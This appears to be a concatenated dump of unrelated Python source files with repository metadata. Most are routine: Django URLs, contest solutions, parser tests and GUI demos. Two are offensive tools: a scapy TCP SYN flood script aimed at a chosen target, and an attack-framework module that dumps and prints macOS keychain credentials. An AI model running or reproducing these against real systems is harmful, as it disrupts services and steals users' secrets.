print("0")
else:
s = 0
for i in range(1, x):
s += int(argv[i])
print("{}".format(s))
|
[
"[email protected]"
] | |
3cad8bd54419850ca2db1e342c3d3452f6f847f5
|
3b4b188514c33a1f4568baa59a2a385a2d7b6205
|
/config/urls.py
|
b7d78a9010e1d399cb8c68101fcb8d15635d4acf
|
[] |
no_license
|
amyth/django-starter
|
5d74a7a5654611f966748523982d9d4591f1e43d
|
8a629cd717c038677488fd1860cc6001baf8c542
|
refs/heads/master
| 2020-05-17T17:32:46.993614 | 2014-09-24T07:15:17 | 2014-09-24T07:15:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 633 |
py
|
""" Main project url confuguration module. Other url modules
to be included in this module.
"""
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Custom apps' urls
url(r'^', include('candidates.urls')),
url(r'^', include('recruiters.urls')),
# Third party apps' urls
url(r'^', include('social_auth.urls')),
url(r'^api', include('rest_framework.urls', namespace='rest_framework')),
# Admin urls
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
)
|
[
"[email protected]"
] | |
087bc3914f01d56c5b118f5446be99dce12b524f
|
bd72c02af0bbd8e3fc0d0b131e3fb9a2aaa93e75
|
/Backtracking/restore_ip_addresses.py
|
9f2f7ded2404852ca3a967a2eb84096a1fa29da3
|
[] |
no_license
|
harvi7/Leetcode-Problems-Python
|
d3a5e8898aceb11abc4cae12e1da50061c1d352c
|
73adc00f6853e821592c68f5dddf0a823cce5d87
|
refs/heads/master
| 2023-05-11T09:03:03.181590 | 2023-04-29T22:03:41 | 2023-04-29T22:03:41 | 222,657,838 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 555 |
py
|
class Solution:
def restoreIpAddresses(self, s: str) -> List[str]:
def dfs(idx, path):
if len(path) == 4 or idx == len(s):
if len(path) == 4 and idx == len(s):
output.append(".".join(path))
return
for i in range(idx, min(idx + 3, len(s))):
ip = s[idx : i + 1]
if i == idx or (i > idx and s[idx] != "0" and int(ip) < 256):
dfs(i + 1, path + [ip])
output = []
dfs(0, [])
return output
|
[
"[email protected]"
] | |
6ae2af63c360ac6ce8e469d4ef399d5bd20040d2
|
6e4e6b64c035881f1cff39db616b0a80e1568c51
|
/JOI7Qual/q1.py
|
360741c86f3ad98b0fc70d4bc433923644dfa0f2
|
[] |
no_license
|
Lischero/Atcoder
|
f7471a85ee553e3ae791e3e5670468aea1fa53cc
|
f674d6a20a56eebdafa6d50d5d2d0f4030e5eace
|
refs/heads/master
| 2020-05-21T16:23:36.095929 | 2018-10-18T04:27:55 | 2018-10-18T04:27:55 | 60,671,810 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 205 |
py
|
# -*- coding:utf-8 -*-
N = int(input())
change = 1000 - N
factors = [500, 100, 50, 10, 5, 1]
ans = 0
for factor in factors:
while change >= factor:
change -= factor
ans += 1
print(ans)
|
[
"[email protected]"
] | |
e2e6ae133a3c7d5e2a67478e807b2afbce460c4e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02921/s327676216.py
|
8d79966a0d9b41817f7a2c90ca060bbf016f3e46
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 625 |
py
|
# -*- coding: utf-8 -*-
## Library
import sys
from fractions import gcd
import math
from math import ceil,floor
import collections
from collections import Counter
import itertools
import copy
## input
# N=int(input())
# A,B,C,D=map(int, input().split())
# S = input()
# yoko = list(map(int, input().split()))
# tate = [int(input()) for _ in range(N)]
# N, M = map(int,input().split())
# P = [list(map(int,input().split())) for i in range(M)]
# S = []
# for _ in range(N):
# S.append(list(input()))
S = input()
T = input()
ans = 0
for i in range(3):
if S[i] == T[i]:
ans += 1
print(ans)
|
[
"[email protected]"
] | |
8a1420991c7365f09dd23479368f9c23d3c181f4
|
485cf3c70fcaa68689a2b690b6465f1d6bcf21bd
|
/Python_Coding_Tips/Code_py/Code(实例源码及使用说明)/01/11/2.列表拼接的4种方法/demo04.py
|
9c2228030fefdd2ff56cc3049a75ad004b1c1f83
|
[] |
no_license
|
lxz0503/study_20190608
|
5ffe08c4704bb00ad8d1980baf16b8f5e7135ff4
|
47c37798140883b8d6dc21ec5da5bc7a20988ce9
|
refs/heads/master
| 2022-12-23T17:23:45.039015 | 2021-06-23T14:50:19 | 2021-06-23T14:50:19 | 190,884,812 | 1 | 3 | null | 2022-12-15T23:17:33 | 2019-06-08T12:22:56 |
Python
|
UTF-8
|
Python
| false | false | 1,015 |
py
|
# *_* coding : UTF-8 *_*
# 开发团队 :明日科技
# 开发人员 :Administrator
# 开发时间 :2019/7/1 15:32
# 文件名称 :demo04.py
# 开发工具 :PyCharm
gem = [["大众",643518],["奔驰",319163],["宝马",265051],["福特",252323],["雪铁龙",227967],["奥迪",255300]]
fra = [["雪铁龙", 698985],["雷诺",547704],["大众",259268],["福特",82633],["宝马",84931],["奔驰",73254]]
eng = [["福特",254082],["大众",203150],["雪铁龙",177298],["奔驰",172238],["宝马",172048],["奥迪",143739]]
for item1, item2, item3 in zip(gem, fra, eng):
print(item1[0], item1[1], " ", item2[0], item2[1], " ", item3[0], item3[1])
for item1, item2, item3 in zip(gem, fra, eng):
item11 = item1[0].ljust(8)
item12 = str(item1[1]).ljust(8)
item21 = item2[0].ljust(8)
item22 = str(item2[1]).ljust(8)
item31 = item1[0].ljust(8)
item32 = str(item3[1]).ljust(8)
print(item11+"\t", item12+"\t", " ", item21+"\t", item22+"\t", " ", item31+"\t", item32)
|
[
"[email protected]"
] | |
c7c5b0151c352832384a07e85f6e49c5f966ec94
|
a0947c2778742aec26b1c0600ceca17df42326cd
|
/Python/PythonInADay2/CSV-Files-Drill/37of79-87.py
|
c6d72c705eb76b99aaf1d8f9ab163131ca821099
|
[] |
no_license
|
JohnCDunn/Course-Work-TTA
|
5758319d4607114914ba9723328658bed8fb2024
|
8c4f60d51007dac2ac4cceb84b0f9666e143c0d7
|
refs/heads/master
| 2021-01-10T16:37:02.609879 | 2016-02-01T18:05:38 | 2016-02-01T18:05:38 | 49,983,248 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 331 |
py
|
import wx
class Frame(wx.Frame):
def __init__(self, title):
wx.Frame.__init__(self, None,\
title=title, size=(300,250))
panel = wx.Panel(self)
wx.SpinCtrl(panel, value='0', pos=(130, 50), size=(70, 25))
app = wx.App()
frame = Frame("wxPython Widgets!")
frame.Show()
app.MainLoop()
|
[
"[email protected]"
] | |
3cacda28f5023df250d156ab5a4eff4b61274f2e
|
dc77896138400114f6770310591fbfb02e36d3cd
|
/{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/common/utils.py
|
cf5bc6fc70109d2f501aa0fa00154039301d810c
|
[
"MIT"
] |
permissive
|
drgarcia1986/cookiecutter-muffin
|
97163a66a57d83dc802223ccbd5307bd1896429d
|
7aa861787b4280477a726da99cf9de4047b01d91
|
refs/heads/master
| 2021-01-01T16:34:08.043952 | 2015-08-27T22:19:35 | 2015-08-27T22:31:22 | 40,458,394 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 216 |
py
|
import muffin
from .. import app
@app.ps.jinja2.context_processor
def current_user_context():
local = muffin.local(app.loop)
current_user = getattr(local, 'current_user')
return {'user': current_user}
|
[
"[email protected]"
] | |
7b7fd334b67b1727da4bdc482d2cdcaadfa4dab1
|
0403dcc7cdf0e8174300569969914e885ebc4a9b
|
/tests/test_scriptdata_longstring.py
|
e12af73e657048fee3f976929a27d7d4d20b3bfb
|
[
"BSD-2-Clause"
] |
permissive
|
chrippa/python-flashmedia
|
03ea9029ef51871872c87d26384bf8433d8b165c
|
f5df4987d6d6661a240756435bb8729f82d8d31f
|
refs/heads/master
| 2021-01-19T19:36:09.256165 | 2013-04-29T10:30:07 | 2013-04-29T10:30:07 | 5,651,549 | 15 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,799 |
py
|
# vim: set fileencoding=utf8 :
from __future__ import unicode_literals
from . import with_fd
from flashmedia.types import ScriptDataLongString
ASCII = b"\x00\x00\x00\x03ABC"
ASCII_SIZE = len(ASCII)
UTF8 = b"\x00\x00\x00\t\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa\x9e"
UTF8_SIZE = len(UTF8)
BROKEN_UTF8 = b"\x00\x00\x00\x08\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa"
BROKEN_UTF8_SIZE = len(BROKEN_UTF8)
def test_pack_ascii():
assert ScriptDataLongString("ABC", "ascii") == ASCII
def test_pack_utf8():
assert ScriptDataLongString("日本語") == UTF8
def test_pack_into():
size = ASCII_SIZE + UTF8_SIZE
buf = bytearray(size)
offset = 0
offset = ScriptDataLongString.pack_into(buf, offset, "ABC", "ascii")
offset = ScriptDataLongString.pack_into(buf, offset, "日本語")
assert buf == (ASCII + UTF8)
assert offset == size
def test_size_ascii():
assert ScriptDataLongString.size("ABC", "ascii") == ASCII_SIZE
def test_size_utf8():
assert ScriptDataLongString.size("日本語") == UTF8_SIZE
@with_fd(ASCII)
def test_read_ascii(fd):
assert ScriptDataLongString.read(fd, "ascii") == "ABC"
assert fd.tell() == ASCII_SIZE
@with_fd(UTF8)
def test_read_utf8(fd):
assert ScriptDataLongString.read(fd) == "日本語"
assert fd.tell() == UTF8_SIZE
@with_fd(BROKEN_UTF8)
def test_read_broken_utf8(fd):
assert ScriptDataLongString.read(fd) == "日本"
assert fd.tell() == BROKEN_UTF8_SIZE
def test_unpack_from():
buf = ASCII + UTF8 + BROKEN_UTF8
offset = 0
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "ABC"
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "日本語"
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "日本"
|
[
"[email protected]"
] | |
3468f78680d2c6fa3b3616f9121f4dae00214184
|
ce55c319f5a78b69fefc63595d433864a2e531b5
|
/爬虫知识/爬虫/04day/04-爬取音乐.py
|
66b60b9b5ade7ecbd06ebc3bde5dd9fae6443f39
|
[] |
no_license
|
Suijng/1809_data
|
a072c875e8746190e3b715e53f1afe3323f4666b
|
45f8a57089f5c30ccc1a3cddb03b76dc95355417
|
refs/heads/master
| 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 |
HTML
|
UTF-8
|
Python
| false | false | 360 |
py
|
import urllib.request
proxy={
'http':'61.176.223.7:58822',
'https':'119.102.132.60:31325'
}
handler = urllib.request.ProxyHandler(
proxies=proxy
)
opener = urllib.request.build_opener(handler)
request = urllib.request.Request(url='http://www.xicidaili.com/')
response = opener.open(request)
content = response.read().decode()
print(content)
|
[
"[email protected]"
] | |
43a04e5ac41572106ab3ff879af6d0b36c7e0e92
|
c36679186f669c6e3bd1c106c96d4a17be1f5ab1
|
/Data Science and Mechine Leraning/99.py
|
a816c6cc8a35dc07365ddd5a9e3c00881cf640da
|
[] |
no_license
|
touhiduzzaman-tuhin/python-code-university-life
|
60a3d671b200a6f5222c6d176c13c5f20f013509
|
6d2e3d90d430faa5c83fe79e7fb1ebe516994762
|
refs/heads/master
| 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 183 |
py
|
import numpy as np
import pandas as pd
li = {'A': [1, 2, np.nan], 'B': [1, np.nan, np.nan], 'C': [1, 2, 3]}
li2 = pd.DataFrame(li)
li3 = li2.fillna(value='FILL VALUE')
print(li3)
|
[
"[email protected]"
] | |
ccbd6d4fef4e78de38c9276cc38f6fa7330b80d5
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/097_beautifulsoup_ii_scrape_us_holidays/save1_passed.py
|
23b546430bed3f5a69c3ef251e95a5ae2acb06fc
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 1,037 |
py
|
from collections import defaultdict
import os
from u__.r.. import u..
from bs4 import BeautifulSoup
# prep data
tmp = os.getenv("TMP", "/tmp")
page = 'us_holidays.html'
holidays_page = os.path.join(tmp, page)
u..(
f'https://bites-data.s3.us-east-2.amazonaws.com/{page}',
holidays_page
)
with open(holidays_page) as f:
content = f.read()
holidays = defaultdict(list)
def get_us_bank_holidays(content=content):
"""Receive scraped html output, make a BS object, parse the bank
holiday table (css class = list-table), and return a dict of
keys -> months and values -> list of bank holidays"""
soup = BeautifulSoup(content, 'html.parser')
right_table = soup.find('table', {'class': 'list-table'})
dates = []
for row in right_table.findAll('time'):
dates.append(row.text[5:7])
holiday = []
for row in right_table.findAll('a'):
holiday.append(row.text.strip())
l = zip(dates, holiday)
for k, v in l:
holidays[k].append(v)
return holidays
|
[
"[email protected]"
] | |
bb02dddbd6ef8c599eda31ca5a6d7365c3f4b787
|
636ba2700eaf3a151b73144b510f38c75ab1919d
|
/ml/m11_kfold_estimators2_cancer.py
|
83c224be41b0db487d18733b67d449cc86ebf928
|
[] |
no_license
|
Taerimmm/ML
|
17997f388e18c28dfd9de83af98a6d4bebe7e1f0
|
6147cede81ebcc95f21adebf75731fbbb11edfab
|
refs/heads/master
| 2023-06-10T14:26:45.335219 | 2021-07-05T15:30:47 | 2021-07-05T15:30:47 | 324,874,959 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,070 |
py
|
from sklearn.model_selection import train_test_split, KFold, cross_val_score
from sklearn.metrics import accuracy_score
from sklearn.utils import all_estimators
from sklearn.datasets import load_breast_cancer
import warnings
warnings.filterwarnings('ignore')
dataset = load_breast_cancer()
x = dataset.data
y = dataset.target
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)
kfold = KFold(n_splits=5, shuffle=True)
import sklearn
print(sklearn.__version__) # 0.23.2
# all_estimators -> 0.20 에 최적화되어있다.
allAlgorithms = all_estimators(type_filter='classifier') # sklearn의 분류형 모델 전체
# print(allAlgorithms)
for (name, algorithm) in allAlgorithms:
try :
model = algorithm()
scores = cross_val_score(model, x_train, y_train, cv=kfold) # cv=5 도 가능 / 이때 shuffle=False
print(name, '의 정답율 :\n', scores)
except :
# continue
print(name, '은 없는 놈') # 0.23.2 에 없는 algorithm
# 기준이 되는 지표로 삼을 수 있다.
|
[
"[email protected]"
] | |
1ced1e5bd8b38f823f7c72e74c340613a4c11f63
|
a9c0daa4a7b9a4d7341afcab270c5b5debb8c13f
|
/env/lib/python3.6/site-packages/pathspec/tests/test_gitignore.py
|
af1ee7a82daa8a6f90fb940d7c15e127faf3eb7e
|
[] |
no_license
|
phamcong/alienator-plf
|
bad8c4e003fd189c43243b31ef2b975b6f154754
|
ea65628af66fbca51f2248ceb4ba93f858dbddce
|
refs/heads/master
| 2022-11-26T01:28:38.286261 | 2017-11-07T15:12:08 | 2017-11-07T15:12:08 | 109,412,097 | 0 | 1 | null | 2020-07-25T23:43:17 | 2017-11-03T15:30:22 |
JavaScript
|
UTF-8
|
Python
| false | false | 5,066 |
py
|
# encoding: utf-8
"""
This script tests ``GitIgnorePattern``.
"""
import unittest
import pathspec.util
from pathspec import GitIgnorePattern
class GitIgnoreTest(unittest.TestCase):
"""
The ``GitIgnoreTest`` class tests the ``GitIgnorePattern``
implementation.
"""
def test_00_empty(self):
"""
Tests an empty pattern.
"""
spec = GitIgnorePattern('')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_01_absolute_root(self):
"""
Tests a single root absolute path pattern.
This should NOT match any file (according to git check-ignore (v2.4.1)).
"""
spec = GitIgnorePattern('/')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_01_absolute(self):
"""
Tests an absolute path pattern.
This should match:
an/absolute/file/path
an/absolute/file/path/foo
This should NOT match:
foo/an/absolute/file/path
"""
spec = GitIgnorePattern('/an/absolute/file/path')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^an/absolute/file/path(?:/.*)?$')
def test_01_relative(self):
"""
Tests a relative path pattern.
This should match:
spam
spam/
foo/spam
spam/foo
foo/spam/bar
"""
spec = GitIgnorePattern('spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')
def test_01_relative_nested(self):
"""
Tests a relative nested path pattern.
This should match:
foo/spam
foo/spam/bar
This should **not** match (according to git check-ignore (v2.4.1)):
bar/foo/spam
"""
spec = GitIgnorePattern('foo/spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^foo/spam(?:/.*)?$')
def test_02_comment(self):
"""
Tests a comment pattern.
"""
spec = GitIgnorePattern('# Cork soakers.')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_02_ignore(self):
"""
Tests an exclude pattern.
This should NOT match (according to git check-ignore (v2.4.1)):
temp/foo
"""
spec = GitIgnorePattern('!temp')
self.assertIsNotNone(spec.include)
self.assertFalse(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?temp$')
def test_03_child_double_asterisk(self):
"""
Tests a directory name with a double-asterisk child
directory.
This should match:
spam/bar
This should **not** match (according to git check-ignore (v2.4.1)):
foo/spam/bar
"""
spec = GitIgnorePattern('spam/**')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^spam/.*$')
def test_03_inner_double_asterisk(self):
"""
Tests a path with an inner double-asterisk directory.
This should match:
left/bar/right
left/foo/bar/right
left/bar/right/foo
This should **not** match (according to git check-ignore (v2.4.1)):
foo/left/bar/right
"""
spec = GitIgnorePattern('left/**/right')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^left(?:/.+)?/right(?:/.*)?$')
def test_03_only_double_asterisk(self):
"""
Tests a double-asterisk pattern which matches everything.
"""
spec = GitIgnorePattern('**')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^.+$')
def test_03_parent_double_asterisk(self):
"""
Tests a file name with a double-asterisk parent directory.
This should match:
foo/spam
foo/spam/bar
"""
spec = GitIgnorePattern('**/spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')
def test_04_infix_wildcard(self):
"""
Tests a pattern with an infix wildcard.
This should match:
foo--bar
foo-hello-bar
a/foo-hello-bar
foo-hello-bar/b
a/foo-hello-bar/b
"""
spec = GitIgnorePattern('foo-*-bar')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?foo\\-[^/]*\\-bar(?:/.*)?$')
def test_04_postfix_wildcard(self):
"""
Tests a pattern with a postfix wildcard.
This should match:
~temp-
~temp-foo
~temp-foo/bar
foo/~temp-bar
foo/~temp-bar/baz
"""
spec = GitIgnorePattern('~temp-*')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?\\~temp\\-[^/]*(?:/.*)?$')
def test_04_prefix_wildcard(self):
"""
Tests a pattern with a prefix wildcard.
This should match:
bar.py
bar.py/
foo/bar.py
foo/bar.py/baz
"""
spec = GitIgnorePattern('*.py')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?[^/]*\\.py(?:/.*)?$')
def test_05_directory(self):
"""
Tests a directory pattern.
This should match:
dir/
foo/dir/
foo/dir/bar
This should **not** match:
dir
"""
spec = GitIgnorePattern('dir/')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?dir/.*$')
def test_05_registered(self):
"""
Tests that the pattern is registered.
"""
self.assertIs(pathspec.util.lookup_pattern('gitignore'), GitIgnorePattern)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(GitIgnoreTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
[
"[email protected]"
] | |
e914343fa85ca6d3f23aeda9938362687fbe0344
|
20c20938e201a0834ccf8b5f2eb5d570d407ad15
|
/abc146/abc146_c/8937880.py
|
ee9c12a0ce700fce574a65e29313213efa3efaa3
|
[] |
no_license
|
kouhei-k/atcoder_submissions
|
8e1a1fb30c38e0d443b585a27c6d134bf1af610a
|
584b4fd842ccfabb16200998fe6652f018edbfc5
|
refs/heads/master
| 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 272 |
py
|
A, B, X = map(int, input().split())
minN = 1
maxN = 10**9
ans = 0
while(1):
N = (minN + maxN) // 2
n = A*N + len(str(N))*B
if n <= X:
ans = N
if minN == maxN:
break
if n < X:
minN = N+1
else:
maxN = N
print(ans)
|
[
"[email protected]"
] | |
30ac3811a3b1bd1fe781ad76f925c49dc1176111
|
84888c7f9d6d7195917053b2d14b2d30e1e5e375
|
/stress_testing/tcp_syn_flood.py
|
165848ca4522c0e0c341fb99281fc5f23da65896
|
[] |
no_license
|
codeandrew/offensivesecurity-python
|
a8d48c565d2434430e6f0e3069385b19dfbdef60
|
364ff7233c31a4a853f9ef185f96078e50c7bef4
|
refs/heads/master
| 2023-08-17T11:23:44.852329 | 2023-08-02T14:54:37 | 2023-08-02T14:54:37 | 242,969,080 | 12 | 5 | null | 2023-09-04T16:45:25 | 2020-02-25T10:10:59 |
Python
|
UTF-8
|
Python
| false | false | 628 |
py
|
from scapy.all import *
import sys
def main(target_ip, target_port, rounds=10_000):
print(f"Target IP: {target_ip}")
print(f"Target Port: {target_port}")
print(f"Rounds: {rounds}")
# Define the payload to send in the packets
payload = "A" * 1024
# Create a loop to send a large number of packets to the target
for i in range(rounds):
packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload
send(packet, verbose=False)
if __name__ == "__main__":
target_ip = sys.argv[1]
target_port = int(sys.argv[2])
main(target_ip=target_ip, target_port=target_port)
|
[
"[email protected]"
] | |
7c9e003239f263252fb0adea540bb5e1962cd733
|
b3b68efa404a7034f0d5a1c10b281ef721f8321a
|
/src/sims4communitylib/enums/common_species.py
|
eacddcd09423a491b7c32754f111f81175abc65a
|
[
"Apache-2.0"
] |
permissive
|
velocist/TS4CheatsInfo
|
62195f3333076c148b2a59f926c9fb5202f1c6fb
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
refs/heads/main
| 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,376 |
py
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from sims.sim_info import SimInfo
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonSpecies(CommonInt):
"""Custom Species enum containing all species (including extended species).
"""
INVALID: 'CommonSpecies' = 0
HUMAN: 'CommonSpecies' = 1
SMALL_DOG: 'CommonSpecies' = 2
LARGE_DOG: 'CommonSpecies' = 3
CAT: 'CommonSpecies' = 4
@staticmethod
def get_species(sim_info: SimInfo) -> 'CommonSpecies':
"""Retrieve the CommonSpecies of a sim. Use this instead of CommonSpeciesUtils.get_species to determine a more specific species.
"""
from sims4communitylib.utils.sims.common_species_utils import CommonSpeciesUtils
if CommonSpeciesUtils.is_human(sim_info):
return CommonSpecies.HUMAN
elif CommonSpeciesUtils.is_small_dog(sim_info):
return CommonSpecies.SMALL_DOG
elif CommonSpeciesUtils.is_large_dog(sim_info):
return CommonSpecies.LARGE_DOG
elif CommonSpeciesUtils.is_cat(sim_info):
return CommonSpecies.CAT
return CommonSpecies.INVALID
|
[
"[email protected]"
] | |
413f0b7b9ab12d75b76ef41418717665a490a242
|
d489eb7998aa09e17ce8d8aef085a65f799e6a02
|
/lib/modules/python/collection/osx/keychaindump_decrypt.py
|
64015ea23ade2de15835ef86ce40b32770ac9187
|
[
"MIT"
] |
permissive
|
fengjixuchui/invader
|
d36078bbef3d740f95930d9896b2d7dd7227474c
|
68153dafbe25e7bb821c8545952d0cc15ae35a3e
|
refs/heads/master
| 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 |
MIT
| 2019-09-26T11:32:39 | 2019-09-07T11:32:17 |
PowerShell
|
UTF-8
|
Python
| false | false | 3,432 |
py
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Sandbox-Keychain-Dump',
# list of one or more authors for the module
'Author': ['@import-au'],
# more verbose multi-line description of the module
'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
"WARNING: Will prompt user for access to each key."
"On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
""
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
'Required': False,
'Value': ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = r"""
import subprocess
import re
process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
keychain = process.communicate()
find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
accounts = find_account.findall(keychain[0])
for account in accounts:
print("System: " + account[0])
print("Description: " + account[2])
print("Username: " + account[1])
print("Secret: " + account[3])
"""
return script
|
[
"[email protected]"
] | |
b9c35bacbba1122e7bf5ad1531e085007384e51a
|
f023692f73992354a0b7823d9c49ae730c95ab52
|
/AtCoderRegularContest/132/C.py
|
3e94b88d37560e4a0f7c839099cf78a2907fed1a
|
[] |
no_license
|
corutopi/AtCorder_python
|
a959e733f9a3549fab7162023e414ac2c99c4abe
|
a2c78cc647076071549e354c398155a65d5e331a
|
refs/heads/master
| 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 |
Python
|
UTF-8
|
Python
| false | false | 1,979 |
py
|
"""
解説AC
変則dp
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# # for pypy
# import pypyjit
# pypyjit.set_param('max_unroll_recursion=-1')
# import bisect
# from collections import deque
# import string
from math import ceil, floor
inf = float('inf')
mod = 10 ** 9 + 7
mod2 = 998244353
# from decorator import stop_watch
#
#
# @stop_watch
def solve(N, D, A):
A = [i for i in range(D)] + [a + D - 1 if a != -1 else a for a in A] + \
[N + D + i for i in range(D)]
used = [0] * len(A)
for a in A:
used[a] = 1 if a != -1 else used[a]
dp = [0] * 2 ** (2 * D + 1)
dp[(1 << (D + 1)) - 1] = 1
for i in range(D, N + D):
dp_new = [0] * 2 ** (2 * D + 1)
for j in range(2 ** (2 * D + 1)):
# i - D - 1 が使用されていないケースはスキップ
# ここで枝刈りしておかないとpythonだと間に合わない
if not j & 1: continue
if A[i] != -1:
# 数字が固定されている場合
if not (j >> (A[i] - i + D + 1) & 1):
tmp = j >> 1 | 1 << (A[i] - i + D)
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
else:
# 固定されていない(-1)の場合
for k in range(2 * D + 1):
if used[i + k - D]: continue # 使用済みの数字は使えない
if not (j >> (k + 1)) & 1:
tmp = j >> 1 | 1 << k
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
dp = dp_new
print(sum(dp))
if __name__ == '__main__':
# S = input()
# N = int(input())
N, D = map(int, input().split())
A = [int(i) for i in input().split()]
solve(N, D, A)
# # test
# from random import randint
# import string
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# solve()
|
[
"[email protected]"
] | |
069869c1802fa40cf5d5a5437907958a0bfa9e2d
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/nistData/list/nonNegativeInteger/Schema+Instance/NISTXML-SV-IV-list-nonNegativeInteger-enumeration-3-1.py
|
0a96f1ef465b374d9e5d0791ff5bc20220dcdd83
